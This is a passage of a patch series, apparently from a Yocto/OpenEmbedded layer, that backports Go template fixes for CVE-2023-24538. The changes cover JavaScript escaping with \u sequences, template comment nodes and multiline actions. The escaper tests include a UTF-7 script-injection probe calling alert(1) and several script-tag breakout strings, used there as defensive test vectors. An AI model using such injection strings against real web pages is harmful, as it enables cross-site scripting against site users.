++		{"<!--", `\u003c!--`},
++		{"-->", `--\u003e`},
+		// From https://code.google.com/p/doctype/wiki/ArticleUtf7
+		{"+ADw-script+AD4-alert(1)+ADw-/script+AD4-",
+-			`\x2bADw-script\x2bAD4-alert(1)\x2bADw-\/script\x2bAD4-`,
++			`\u002bADw-script\u002bAD4-alert(1)\u002bADw-\/script\u002bAD4-`,
+		},
+		// Invalid UTF-8 sequence
+		{"foo\xA0bar", "foo\xA0bar"},
+@@ -228,7 +228,7 @@ func TestJSRegexpEscaper(t *testing.T) {
+	}{
+		{"", `(?:)`},
+		{"foo", `foo`},
+-		{"\u0000", `\0`},
++		{"\u0000", `\u0000`},
+		{"\t", `\t`},
+		{"\n", `\n`},
+		{"\r", `\r`},
+@@ -238,19 +238,19 @@ func TestJSRegexpEscaper(t *testing.T) {
+		{"\\n", `\\n`},
+		{"foo\r\nbar", `foo\r\nbar`},
+		// Preserve attribute boundaries.
+-		{`"`, `\x22`},
+-		{`'`, `\x27`},
++		{`"`, `\u0022`},
++		{`'`, `\u0027`},
+		// Allow embedding in HTML without further escaping.
+-		{`&amp;`, `\x26amp;`},
++		{`&amp;`, `\u0026amp;`},
+		// Prevent breaking out of text node and element boundaries.
+-		{"</script>", `\x3c\/script\x3e`},
+-		{"<![CDATA[", `\x3c!\[CDATA\[`},
+-		{"]]>", `\]\]\x3e`},
++		{"</script>", `\u003c\/script\u003e`},
++		{"<![CDATA[", `\u003c!\[CDATA\[`},
++		{"]]>", `\]\]\u003e`},
+		// Escaping text spans.
+-		{"<!--", `\x3c!\-\-`},
+-		{"-->", `\-\-\x3e`},
++		{"<!--", `\u003c!\-\-`},
++		{"-->", `\-\-\u003e`},
+		{"*", `\*`},
+-		{"+", `\x2b`},
++		{"+", `\u002b`},
+		{"?", `\?`},
+		{"[](){}", `\[\]\(\)\{\}`},
+		{"$foo|x.y", `\$foo\|x\.y`},
+@@ -284,27 +284,27 @@ func TestEscapersOnLower7AndSelectHighCodepoints(t *testing.T) {
+		{
+			"jsStrEscaper",
+			jsStrEscaper,
+-			"\\0\x01\x02\x03\x04\x05\x06\x07" +
+-				"\x08\\t\\n\\x0b\\f\\r\x0E\x0F" +
+-				"\x10\x11\x12\x13\x14\x15\x16\x17" +
+-				"\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" +
+-				` !\x22#$%\x26\x27()*\x2b,-.\/` +
+-				`0123456789:;\x3c=\x3e?` +
++			`\u0000\u0001\u0002\u0003\u0004\u0005\u0006\u0007` +
++				`\u0008\t\n\u000b\f\r\u000e\u000f` +
++				`\u0010\u0011\u0012\u0013\u0014\u0015\u0016\u0017` +
++				`\u0018\u0019\u001a\u001b\u001c\u001d\u001e\u001f` +
++				` !\u0022#$%\u0026\u0027()*\u002b,-.\/` +
++				`0123456789:;\u003c=\u003e?` +
+				`@ABCDEFGHIJKLMNO` +
+				`PQRSTUVWXYZ[\\]^_` +
+				"`abcdefghijklmno" +
+-				"pqrstuvwxyz{|}~\x7f" +
++				"pqrstuvwxyz{|}~\u007f" +
+				"\u00A0\u0100\\u2028\\u2029\ufeff\U0001D11E",
+		},
+		{
+			"jsRegexpEscaper",
+			jsRegexpEscaper,
+-			"\\0\x01\x02\x03\x04\x05\x06\x07" +
+-				"\x08\\t\\n\\x0b\\f\\r\x0E\x0F" +
+-				"\x10\x11\x12\x13\x14\x15\x16\x17" +
+-				"\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" +
+-				` !\x22#\$%\x26\x27\(\)\*\x2b,\-\.\/` +
+-				`0123456789:;\x3c=\x3e\?` +
++			`\u0000\u0001\u0002\u0003\u0004\u0005\u0006\u0007` +
++				`\u0008\t\n\u000b\f\r\u000e\u000f` +
++				`\u0010\u0011\u0012\u0013\u0014\u0015\u0016\u0017` +
++				`\u0018\u0019\u001a\u001b\u001c\u001d\u001e\u001f` +
++				` !\u0022#\$%\u0026\u0027\(\)\*\u002b,\-\.\/` +
++				`0123456789:;\u003c=\u003e\?` +
+				`@ABCDEFGHIJKLMNO` +
+				`PQRSTUVWXYZ\[\\\]\^_` +
+				"`abcdefghijklmno" +
+diff --git a/src/html/template/template_test.go b/src/html/template/template_test.go
+index 13e6ba4..86bd4db 100644
+--- a/src/html/template/template_test.go
++++ b/src/html/template/template_test.go
+@@ -6,6 +6,7 @@ package template_test
+
+ import (
+	"bytes"
++	"encoding/json"
+	. "html/template"
+	"strings"
+	"testing"
+@@ -121,6 +122,44 @@ func TestNumbers(t *testing.T) {
+	c.mustExecute(c.root, nil, "12.34 7.5")
+ }
+
++func TestStringsInScriptsWithJsonContentTypeAreCorrectlyEscaped(t *testing.T) {
++	// See #33671 and #37634 for more context on this.
++	tests := []struct{ name, in string }{
++		{"empty", ""},
++		{"invalid", string(rune(-1))},
++		{"null", "\u0000"},
++		{"unit separator", "\u001F"},
++		{"tab", "\t"},
++		{"gt and lt", "<>"},
++		{"quotes", `'"`},
++		{"ASCII letters", "ASCII letters"},
++		{"Unicode", "ʕ⊙ϖ⊙ʔ"},
++		{"Pizza", "P"},
++	}
++	const (
++		prefix = `<script type="application/ld+json">`
++		suffix = `</script>`
++		templ  = prefix + `"{{.}}"` + suffix
++	)
++	tpl := Must(New("JS string is JSON string").Parse(templ))
++	for _, tt := range tests {
++		t.Run(tt.name, func(t *testing.T) {
++			var buf bytes.Buffer
++			if err := tpl.Execute(&buf, tt.in); err != nil {
++				t.Fatalf("Cannot render template: %v", err)
++			}
++			trimmed := bytes.TrimSuffix(bytes.TrimPrefix(buf.Bytes(), []byte(prefix)), []byte(suffix))
++			var got string
++			if err := json.Unmarshal(trimmed, &got); err != nil {
++				t.Fatalf("Cannot parse JS string %q as JSON: %v", trimmed[1:len(trimmed)-1], err)
++			}
++			if got != tt.in {
++				t.Errorf("Serialization changed the string value: got %q want %q", got, tt.in)
++			}
++		})
++	}
++}
++
+ type testCase struct {
+	t    *testing.T
+	root *Template
+diff --git a/src/text/template/exec_test.go b/src/text/template/exec_test.go
+index 77294ed..b8a809e 100644
+--- a/src/text/template/exec_test.go
++++ b/src/text/template/exec_test.go
+@@ -911,9 +911,9 @@ func TestJSEscaping(t *testing.T) {
+		{`Go "jump" \`, `Go \"jump\" \\`},
+		{`Yukihiro says "今日�世界"`, `Yukihiro says \"今日�世界\"`},
+		{"unprintable \uFDFF", `unprintable \uFDFF`},
+-		{`<html>`, `\x3Chtml\x3E`},
+-		{`no = in attributes`, `no \x3D in attributes`},
+-		{`&#x27; does not become HTML entity`, `\x26#x27; does not become HTML entity`},
++		{`<html>`, `\u003Chtml\u003E`},
++		{`no = in attributes`, `no \u003D in attributes`},
++		{`&#x27; does not become HTML entity`, `\u0026#x27; does not become HTML entity`},
+	}
+	for _, tc := range testCases {
+		s := JSEscapeString(tc.in)
+diff --git a/src/text/template/funcs.go b/src/text/template/funcs.go
+index 46125bc..f3de9fb 100644
+--- a/src/text/template/funcs.go
++++ b/src/text/template/funcs.go
+@@ -640,10 +640,10 @@ var (
+	jsBackslash = []byte(`\\`)
+	jsApos      = []byte(`\'`)
+	jsQuot      = []byte(`\"`)
+-	jsLt        = []byte(`\x3C`)
+-	jsGt        = []byte(`\x3E`)
+-	jsAmp       = []byte(`\x26`)
+-	jsEq        = []byte(`\x3D`)
++	jsLt        = []byte(`\u003C`)
++	jsGt        = []byte(`\u003E`)
++	jsAmp       = []byte(`\u0026`)
++	jsEq        = []byte(`\u003D`)
+ )
+
+ // JSEscape writes to w the escaped JavaScript equivalent of the plain text data b.
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_3.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_3.patch
new file mode 100644
index 0000000000..cd7dd0957c
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_3.patch
@@ -0,0 +1,393 @@
+From 7ddce23c7d5b728acf8482f5006497c7b9915f8a Mon Sep 17 00:00:00 2001
+From: Ariel Mashraki <ariel@mashraki.co.il>
+Date: Wed, 22 Apr 2020 22:17:56 +0300
+Subject: [PATCH 3/6] text/template: add CommentNode to template parse tree
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Fixes #34652
+
+Change-Id: Icf6e3eda593fed826736f34f95a9d66f5450cc98
+Reviewed-on: https://go-review.googlesource.com/c/go/+/229398
+Reviewed-by: Daniel Martí <mvdan@mvdan.cc>
+Run-TryBot: Daniel Martí <mvdan@mvdan.cc>
+TryBot-Result: Gobot Gobot <gobot@golang.org>
+
+Dependency Patch #3
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/c8ea03828b0645b1fd5725888e44873b75fcfbb6
+CVE: CVE-2023-24538
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ api/next.txt                          | 19 +++++++++++++++++++
+ src/html/template/escape.go           |  2 ++
+ src/html/template/template_test.go    | 16 ++++++++++++++++
+ src/text/template/exec.go             |  1 +
+ src/text/template/parse/lex.go        |  8 +++++++-
+ src/text/template/parse/lex_test.go   |  7 +++++--
+ src/text/template/parse/node.go       | 33 +++++++++++++++++++++++++++++++++
+ src/text/template/parse/parse.go      | 22 +++++++++++++++++++---
+ src/text/template/parse/parse_test.go | 25 +++++++++++++++++++++++++
+ 9 files changed, 127 insertions(+), 6 deletions(-)
+
+diff --git a/api/next.txt b/api/next.txt
+index e69de29..076f39e 100644
+--- a/api/next.txt
++++ b/api/next.txt
+@@ -0,0 +1,19 @@
++pkg unicode, const Version = "13.0.0"
++pkg unicode, var Chorasmian *RangeTable
++pkg unicode, var Dives_Akuru *RangeTable
++pkg unicode, var Khitan_Small_Script *RangeTable
++pkg unicode, var Yezidi *RangeTable
++pkg text/template/parse, const NodeComment = 20
++pkg text/template/parse, const NodeComment NodeType
++pkg text/template/parse, const ParseComments = 1
++pkg text/template/parse, const ParseComments Mode
++pkg text/template/parse, method (*CommentNode) Copy() Node
++pkg text/template/parse, method (*CommentNode) String() string
++pkg text/template/parse, method (CommentNode) Position() Pos
++pkg text/template/parse, method (CommentNode) Type() NodeType
++pkg text/template/parse, type CommentNode struct
++pkg text/template/parse, type CommentNode struct, Text string
++pkg text/template/parse, type CommentNode struct, embedded NodeType
++pkg text/template/parse, type CommentNode struct, embedded Pos
++pkg text/template/parse, type Mode uint
++pkg text/template/parse, type Tree struct, Mode Mode
+diff --git a/src/html/template/escape.go b/src/html/template/escape.go
+index f12dafa..8739735 100644
+--- a/src/html/template/escape.go
++++ b/src/html/template/escape.go
+@@ -124,6 +124,8 @@ func (e *escaper) escape(c context, n parse.Node) context {
+	switch n := n.(type) {
+	case *parse.ActionNode:
+		return e.escapeAction(c, n)
++	case *parse.CommentNode:
++		return c
+	case *parse.IfNode:
+		return e.escapeBranch(c, &n.BranchNode, "if")
+	case *parse.ListNode:
+diff --git a/src/html/template/template_test.go b/src/html/template/template_test.go
+index 86bd4db..1f2c888 100644
+--- a/src/html/template/template_test.go
++++ b/src/html/template/template_test.go
+@@ -10,6 +10,7 @@ import (
+	. "html/template"
+	"strings"
+	"testing"
++	"text/template/parse"
+ )
+
+ func TestTemplateClone(t *testing.T) {
+@@ -160,6 +161,21 @@ func TestStringsInScriptsWithJsonContentTypeAreCorrectlyEscaped(t *testing.T) {
+	}
+ }
+
++func TestSkipEscapeComments(t *testing.T) {
++	c := newTestCase(t)
++	tr := parse.New("root")
++	tr.Mode = parse.ParseComments
++	newT, err := tr.Parse("{{/* A comment */}}{{ 1 }}{{/* Another comment */}}", "", "", make(map[string]*parse.Tree))
++	if err != nil {
++		t.Fatalf("Cannot parse template text: %v", err)
++	}
++	c.root, err = c.root.AddParseTree("root", newT)
++	if err != nil {
++		t.Fatalf("Cannot add parse tree to template: %v", err)
++	}
++	c.mustExecute(c.root, nil, "1")
++}
++
+ type testCase struct {
+	t    *testing.T
+	root *Template
+diff --git a/src/text/template/exec.go b/src/text/template/exec.go
+index ac3e741..7ac5175 100644
+--- a/src/text/template/exec.go
++++ b/src/text/template/exec.go
+@@ -256,6 +256,7 @@ func (s *state) walk(dot reflect.Value, node parse.Node) {
+		if len(node.Pipe.Decl) == 0 {
+			s.printValue(node, val)
+		}
++	case *parse.CommentNode:
+	case *parse.IfNode:
+		s.walkIfOrWith(parse.NodeIf, dot, node.Pipe, node.List, node.ElseList)
+	case *parse.ListNode:
+diff --git a/src/text/template/parse/lex.go b/src/text/template/parse/lex.go
+index 30371f2..e41373a 100644
+--- a/src/text/template/parse/lex.go
++++ b/src/text/template/parse/lex.go
+@@ -41,6 +41,7 @@ const (
+	itemBool                         // boolean constant
+	itemChar                         // printable ASCII character; grab bag for comma etc.
+	itemCharConstant                 // character constant
++	itemComment                      // comment text
+	itemComplex                      // complex constant (1+2i); imaginary is just a number
+	itemAssign                       // equals ('=') introducing an assignment
+	itemDeclare                      // colon-equals (':=') introducing a declaration
+@@ -112,6 +113,7 @@ type lexer struct {
+	leftDelim      string    // start of action
+	rightDelim     string    // end of action
+	trimRightDelim string    // end of action with trim marker
++	emitComment    bool      // emit itemComment tokens.
+	pos            Pos       // current position in the input
+	start          Pos       // start position of this item
+	width          Pos       // width of last rune read from input
+@@ -203,7 +205,7 @@ func (l *lexer) drain() {
+ }
+
+ // lex creates a new scanner for the input string.
+-func lex(name, input, left, right string) *lexer {
++func lex(name, input, left, right string, emitComment bool) *lexer {
+	if left == "" {
+		left = leftDelim
+	}
+@@ -216,6 +218,7 @@ func lex(name, input, left, right string) *lexer {
+		leftDelim:      left,
+		rightDelim:     right,
+		trimRightDelim: rightTrimMarker + right,
++		emitComment:    emitComment,
+		items:          make(chan item),
+		line:           1,
+		startLine:      1,
+@@ -323,6 +326,9 @@ func lexComment(l *lexer) stateFn {
+	if !delim {
+		return l.errorf("comment ends before closing delimiter")
+	}
++	if l.emitComment {
++		l.emit(itemComment)
++	}
+	if trimSpace {
+		l.pos += trimMarkerLen
+	}
+diff --git a/src/text/template/parse/lex_test.go b/src/text/template/parse/lex_test.go
+index 563c4fc..f6d5f28 100644
+--- a/src/text/template/parse/lex_test.go
++++ b/src/text/template/parse/lex_test.go
+@@ -15,6 +15,7 @@ var itemName = map[itemType]string{
+	itemBool:         "bool",
+	itemChar:         "char",
+	itemCharConstant: "charconst",
++	itemComment:      "comment",
+	itemComplex:      "complex",
+	itemDeclare:      ":=",
+	itemEOF:          "EOF",
+@@ -90,6 +91,7 @@ var lexTests = []lexTest{
+	{"text", `now is the time`, []item{mkItem(itemText, "now is the time"), tEOF}},
+	{"text with comment", "hello-{{/* this is a comment */}}-world", []item{
+		mkItem(itemText, "hello-"),
++		mkItem(itemComment, "/* this is a comment */"),
+		mkItem(itemText, "-world"),
+		tEOF,
+	}},
+@@ -311,6 +313,7 @@ var lexTests = []lexTest{
+	}},
+	{"trimming spaces before and after comment", "hello- {{- /* hello */ -}} -world", []item{
+		mkItem(itemText, "hello-"),
++		mkItem(itemComment, "/* hello */"),
+		mkItem(itemText, "-world"),
+		tEOF,
+	}},
+@@ -389,7 +392,7 @@ var lexTests = []lexTest{
+
+ // collect gathers the emitted items into a slice.
+ func collect(t *lexTest, left, right string) (items []item) {
+-	l := lex(t.name, t.input, left, right)
++	l := lex(t.name, t.input, left, right, true)
+	for {
+		item := l.nextItem()
+		items = append(items, item)
+@@ -529,7 +532,7 @@ func TestPos(t *testing.T) {
+ func TestShutdown(t *testing.T) {
+	// We need to duplicate template.Parse here to hold on to the lexer.
+	const text = "erroneous{{define}}{{else}}1234"
+-	lexer := lex("foo", text, "{{", "}}")
++	lexer := lex("foo", text, "{{", "}}", false)
+	_, err := New("root").parseLexer(lexer)
+	if err == nil {
+		t.Fatalf("expected error")
+diff --git a/src/text/template/parse/node.go b/src/text/template/parse/node.go
+index 1c116ea..a9dad5e 100644
+--- a/src/text/template/parse/node.go
++++ b/src/text/template/parse/node.go
+@@ -70,6 +70,7 @@ const (
+	NodeTemplate                   // A template invocation action.
+	NodeVariable                   // A $ variable.
+	NodeWith                       // A with action.
++	NodeComment                    // A comment.
+ )
+
+ // Nodes.
+@@ -149,6 +150,38 @@ func (t *TextNode) Copy() Node {
+	return &TextNode{tr: t.tr, NodeType: NodeText, Pos: t.Pos, Text: append([]byte{}, t.Text...)}
+ }
+
++// CommentNode holds a comment.
++type CommentNode struct {
++	NodeType
++	Pos
++	tr   *Tree
++	Text string // Comment text.
++}
++
++func (t *Tree) newComment(pos Pos, text string) *CommentNode {
++	return &CommentNode{tr: t, NodeType: NodeComment, Pos: pos, Text: text}
++}
++
++func (c *CommentNode) String() string {
++	var sb strings.Builder
++	c.writeTo(&sb)
++	return sb.String()
++}
++
++func (c *CommentNode) writeTo(sb *strings.Builder) {
++	sb.WriteString("{{")
++	sb.WriteString(c.Text)
++	sb.WriteString("}}")
++}
++
++func (c *CommentNode) tree() *Tree {
++	return c.tr
++}
++
++func (c *CommentNode) Copy() Node {
++	return &CommentNode{tr: c.tr, NodeType: NodeComment, Pos: c.Pos, Text: c.Text}
++}
++
+ // PipeNode holds a pipeline with optional declaration
+ type PipeNode struct {
+	NodeType
+diff --git a/src/text/template/parse/parse.go b/src/text/template/parse/parse.go
+index c9b80f4..496d8bf 100644
+--- a/src/text/template/parse/parse.go
++++ b/src/text/template/parse/parse.go
+@@ -21,6 +21,7 @@ type Tree struct {
+	Name      string    // name of the template represented by the tree.
+	ParseName string    // name of the top-level template during parsing, for error messages.
+	Root      *ListNode // top-level root of the tree.
++	Mode      Mode      // parsing mode.
+	text      string    // text parsed to create the template (or its parent)
+	// Parsing only; cleared after parse.
+	funcs     []map[string]interface{}
+@@ -29,8 +30,16 @@ type Tree struct {
+	peekCount int
+	vars      []string // variables defined at the moment.
+	treeSet   map[string]*Tree
++	mode      Mode
+ }
+
++// A mode value is a set of flags (or 0). Modes control parser behavior.
++type Mode uint
++
++const (
++	ParseComments Mode = 1 << iota // parse comments and add them to AST
++)
++
+ // Copy returns a copy of the Tree. Any parsing state is discarded.
+ func (t *Tree) Copy() *Tree {
+	if t == nil {
+@@ -220,7 +229,8 @@ func (t *Tree) stopParse() {
+ func (t *Tree) Parse(text, leftDelim, rightDelim string, treeSet map[string]*Tree, funcs ...map[string]interface{}) (tree *Tree, err error) {
+	defer t.recover(&err)
+	t.ParseName = t.Name
+-	t.startParse(funcs, lex(t.Name, text, leftDelim, rightDelim), treeSet)
++	emitComment := t.Mode&ParseComments != 0
++	t.startParse(funcs, lex(t.Name, text, leftDelim, rightDelim, emitComment), treeSet)
+	t.text = text
+	t.parse()
+	t.add()
+@@ -240,12 +250,14 @@ func (t *Tree) add() {
+	}
+ }
+
+-// IsEmptyTree reports whether this tree (node) is empty of everything but space.
++// IsEmptyTree reports whether this tree (node) is empty of everything but space or comments.
+ func IsEmptyTree(n Node) bool {
+	switch n := n.(type) {
+	case nil:
+		return true
+	case *ActionNode:
++	case *CommentNode:
++		return true
+	case *IfNode:
+	case *ListNode:
+		for _, node := range n.Nodes {
+@@ -276,6 +288,7 @@ func (t *Tree) parse() {
+			if t.nextNonSpace().typ == itemDefine {
+				newT := New("definition") // name will be updated once we know it.
+				newT.text = t.text
++				newT.Mode = t.Mode
+				newT.ParseName = t.ParseName
+				newT.startParse(t.funcs, t.lex, t.treeSet)
+				newT.parseDefinition()
+@@ -331,13 +344,15 @@ func (t *Tree) itemList() (list *ListNode, next Node) {
+ }
+
+ // textOrAction:
+-//	text | action
++//	text | comment | action
+ func (t *Tree) textOrAction() Node {
+	switch token := t.nextNonSpace(); token.typ {
+	case itemText:
+		return t.newText(token.pos, token.val)
+	case itemLeftDelim:
+		return t.action()
++	case itemComment:
++		return t.newComment(token.pos, token.val)
+	default:
+		t.unexpected(token, "input")
+	}
+@@ -539,6 +554,7 @@ func (t *Tree) blockControl() Node {
+
+	block := New(name) // name will be updated once we know it.
+	block.text = t.text
++	block.Mode = t.Mode
+	block.ParseName = t.ParseName
+	block.startParse(t.funcs, t.lex, t.treeSet)
+	var end Node
+diff --git a/src/text/template/parse/parse_test.go b/src/text/template/parse/parse_test.go
+index 4e09a78..d9c13c5 100644
+--- a/src/text/template/parse/parse_test.go
++++ b/src/text/template/parse/parse_test.go
+@@ -348,6 +348,30 @@ func TestParseCopy(t *testing.T) {
+	testParse(true, t)
+ }
+
++func TestParseWithComments(t *testing.T) {
++	textFormat = "%q"
++	defer func() { textFormat = "%s" }()
++	tests := [...]parseTest{
++		{"comment", "{{/*\n\n\n*/}}", noError, "{{/*\n\n\n*/}}"},
++		{"comment trim left", "x \r\n\t{{- /* hi */}}", noError, `"x"{{/* hi */}}`},
++		{"comment trim right", "{{/* hi */ -}}\n\n\ty", noError, `{{/* hi */}}"y"`},
++		{"comment trim left and right", "x \r\n\t{{- /* */ -}}\n\n\ty", noError, `"x"{{/* */}}"y"`},
++	}
++	for _, test := range tests {
++		t.Run(test.name, func(t *testing.T) {
++			tr := New(test.name)
++			tr.Mode = ParseComments
++			tmpl, err := tr.Parse(test.input, "", "", make(map[string]*Tree))
++			if err != nil {
++				t.Errorf("%q: expected error; got none", test.name)
++			}
++			if result := tmpl.Root.String(); result != test.result {
++				t.Errorf("%s=(%q): got\n\t%v\nexpected\n\t%v", test.name, test.input, result, test.result)
++			}
++		})
++	}
++}
++
+ type isEmptyTest struct {
+	name  string
+	input string
+@@ -358,6 +382,7 @@ var isEmptyTests = []isEmptyTest{
+	{"empty", ``, true},
+	{"nonempty", `hello`, false},
+	{"spaces only", " \t\n \t\n", true},
++	{"comment only", "{{/* comment */}}", true},
+	{"definition", `{{define "x"}}something{{end}}`, true},
+	{"definitions and space", "{{define `x`}}something{{end}}\n\n{{define `y`}}something{{end}}\n\n", true},
+	{"definitions and text", "{{define `x`}}something{{end}}\nx\n{{define `y`}}something{{end}}\ny\n", false},
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_4.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_4.patch
new file mode 100644
index 0000000000..d5e2eb6684
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_4.patch
@@ -0,0 +1,497 @@
+From 760d88497091fb5d6d231a18e6f4e06ecb9af9b2 Mon Sep 17 00:00:00 2001
+From: Russ Cox <rsc@golang.org>
+Date: Thu, 10 Sep 2020 18:53:26 -0400
+Subject: [PATCH 4/6] text/template: allow newlines inside action delimiters
+
+This allows multiline constructs like:
+
+	{{"hello" |
+	  printf}}
+
+Now that unclosed actions can span multiple lines,
+track and report the start of the action when reporting errors.
+
+Also clean up a few "unexpected <error message>" to be just "<error message>".
+
+Fixes #29770.
+
+Change-Id: I54c6c016029a8328b7902a4b6d85eab713ec3285
+Reviewed-on: https://go-review.googlesource.com/c/go/+/254257
+Trust: Russ Cox <rsc@golang.org>
+Run-TryBot: Russ Cox <rsc@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Rob Pike <r@golang.org>
+
+Dependency Patch #4
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/9384d34c58099657bb1b133beaf3ff37ada9b017
+CVE: CVE-2023-24538
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/text/template/doc.go              | 21 ++++-----
+ src/text/template/exec_test.go        |  2 +-
+ src/text/template/parse/lex.go        | 84 +++++++++++++++++------------------
+ src/text/template/parse/lex_test.go   |  2 +-
+ src/text/template/parse/parse.go      | 59 +++++++++++++-----------
+ src/text/template/parse/parse_test.go | 36 ++++++++++++---
+ 6 files changed, 117 insertions(+), 87 deletions(-)
+
+diff --git a/src/text/template/doc.go b/src/text/template/doc.go
+index 4b0efd2..7b30294 100644
+--- a/src/text/template/doc.go
++++ b/src/text/template/doc.go
+@@ -40,16 +40,17 @@ More intricate examples appear below.
+ Text and spaces
+
+ By default, all text between actions is copied verbatim when the template is
+-executed. For example, the string " items are made of " in the example above appears
+-on standard output when the program is run.
+-
+-However, to aid in formatting template source code, if an action's left delimiter
+-(by default "{{") is followed immediately by a minus sign and ASCII space character
+-("{{- "), all trailing white space is trimmed from the immediately preceding text.
+-Similarly, if the right delimiter ("}}") is preceded by a space and minus sign
+-(" -}}"), all leading white space is trimmed from the immediately following text.
+-In these trim markers, the ASCII space must be present; "{{-3}}" parses as an
+-action containing the number -3.
++executed. For example, the string " items are made of " in the example above
++appears on standard output when the program is run.
++
++However, to aid in formatting template source code, if an action's left
++delimiter (by default "{{") is followed immediately by a minus sign and white
++space, all trailing white space is trimmed from the immediately preceding text.
++Similarly, if the right delimiter ("}}") is preceded by white space and a minus
++sign, all leading white space is trimmed from the immediately following text.
++In these trim markers, the white space must be present:
++"{{- 3}}" is like "{{3}}" but trims the immediately preceding text, while
++"{{-3}}" parses as an action containing the number -3.
+
+ For instance, when executing the template whose source is
+
+diff --git a/src/text/template/exec_test.go b/src/text/template/exec_test.go
+index b8a809e..3309b33 100644
+--- a/src/text/template/exec_test.go
++++ b/src/text/template/exec_test.go
+@@ -1295,7 +1295,7 @@ func TestUnterminatedStringError(t *testing.T) {
+		t.Fatal("expected error")
+	}
+	str := err.Error()
+-	if !strings.Contains(str, "X:3: unexpected unterminated raw quoted string") {
++	if !strings.Contains(str, "X:3: unterminated raw quoted string") {
+		t.Fatalf("unexpected error: %s", str)
+	}
+ }
+diff --git a/src/text/template/parse/lex.go b/src/text/template/parse/lex.go
+index e41373a..6784071 100644
+--- a/src/text/template/parse/lex.go
++++ b/src/text/template/parse/lex.go
+@@ -92,15 +92,14 @@ const eof = -1
+ // If the action begins "{{- " rather than "{{", then all space/tab/newlines
+ // preceding the action are trimmed; conversely if it ends " -}}" the
+ // leading spaces are trimmed. This is done entirely in the lexer; the
+-// parser never sees it happen. We require an ASCII space to be
+-// present to avoid ambiguity with things like "{{-3}}". It reads
++// parser never sees it happen. We require an ASCII space (' ', \t, \r, \n)
++// to be present to avoid ambiguity with things like "{{-3}}". It reads
+ // better with the space present anyway. For simplicity, only ASCII
+-// space does the job.
++// does the job.
+ const (
+-	spaceChars      = " \t\r\n" // These are the space characters defined by Go itself.
+-	leftTrimMarker  = "- "      // Attached to left delimiter, trims trailing spaces from preceding text.
+-	rightTrimMarker = " -"      // Attached to right delimiter, trims leading spaces from following text.
+-	trimMarkerLen   = Pos(len(leftTrimMarker))
++	spaceChars    = " \t\r\n"  // These are the space characters defined by Go itself.
++	trimMarker    = '-'        // Attached to left/right delimiter, trims trailing spaces from preceding/following text.
++	trimMarkerLen = Pos(1 + 1) // marker plus space before or after
+ )
+
+ // stateFn represents the state of the scanner as a function that returns the next state.
+@@ -108,19 +107,18 @@ type stateFn func(*lexer) stateFn
+
+ // lexer holds the state of the scanner.
+ type lexer struct {
+-	name           string    // the name of the input; used only for error reports
+-	input          string    // the string being scanned
+-	leftDelim      string    // start of action
+-	rightDelim     string    // end of action
+-	trimRightDelim string    // end of action with trim marker
+-	emitComment    bool      // emit itemComment tokens.
+-	pos            Pos       // current position in the input
+-	start          Pos       // start position of this item
+-	width          Pos       // width of last rune read from input
+-	items          chan item // channel of scanned items
+-	parenDepth     int       // nesting depth of ( ) exprs
+-	line           int       // 1+number of newlines seen
+-	startLine      int       // start line of this item
++	name        string    // the name of the input; used only for error reports
++	input       string    // the string being scanned
++	leftDelim   string    // start of action
++	rightDelim  string    // end of action
++	emitComment bool      // emit itemComment tokens.
++	pos         Pos       // current position in the input
++	start       Pos       // start position of this item
++	width       Pos       // width of last rune read from input
++	items       chan item // channel of scanned items
++	parenDepth  int       // nesting depth of ( ) exprs
++	line        int       // 1+number of newlines seen
++	startLine   int       // start line of this item
+ }
+
+ // next returns the next rune in the input.
+@@ -213,15 +211,14 @@ func lex(name, input, left, right string, emitComment bool) *lexer {
+		right = rightDelim
+	}
+	l := &lexer{
+-		name:           name,
+-		input:          input,
+-		leftDelim:      left,
+-		rightDelim:     right,
+-		trimRightDelim: rightTrimMarker + right,
+-		emitComment:    emitComment,
+-		items:          make(chan item),
+-		line:           1,
+-		startLine:      1,
++		name:        name,
++		input:       input,
++		leftDelim:   left,
++		rightDelim:  right,
++		emitComment: emitComment,
++		items:       make(chan item),
++		line:        1,
++		startLine:   1,
+	}
+	go l.run()
+	return l
+@@ -251,7 +248,7 @@ func lexText(l *lexer) stateFn {
+		ldn := Pos(len(l.leftDelim))
+		l.pos += Pos(x)
+		trimLength := Pos(0)
+-		if strings.HasPrefix(l.input[l.pos+ldn:], leftTrimMarker) {
++		if hasLeftTrimMarker(l.input[l.pos+ldn:]) {
+			trimLength = rightTrimLength(l.input[l.start:l.pos])
+		}
+		l.pos -= trimLength
+@@ -280,7 +277,7 @@ func rightTrimLength(s string) Pos {
+
+ // atRightDelim reports whether the lexer is at a right delimiter, possibly preceded by a trim marker.
+ func (l *lexer) atRightDelim() (delim, trimSpaces bool) {
+-	if strings.HasPrefix(l.input[l.pos:], l.trimRightDelim) { // With trim marker.
++	if hasRightTrimMarker(l.input[l.pos:]) && strings.HasPrefix(l.input[l.pos+trimMarkerLen:], l.rightDelim) { // With trim marker.
+		return true, true
+	}
+	if strings.HasPrefix(l.input[l.pos:], l.rightDelim) { // Without trim marker.
+@@ -297,7 +294,7 @@ func leftTrimLength(s string) Pos {
+ // lexLeftDelim scans the left delimiter, which is known to be present, possibly with a trim marker.
+ func lexLeftDelim(l *lexer) stateFn {
+	l.pos += Pos(len(l.leftDelim))
+-	trimSpace := strings.HasPrefix(l.input[l.pos:], leftTrimMarker)
++	trimSpace := hasLeftTrimMarker(l.input[l.pos:])
+	afterMarker := Pos(0)
+	if trimSpace {
+		afterMarker = trimMarkerLen
+@@ -342,7 +339,7 @@ func lexComment(l *lexer) stateFn {
+
+ // lexRightDelim scans the right delimiter, which is known to be present, possibly with a trim marker.
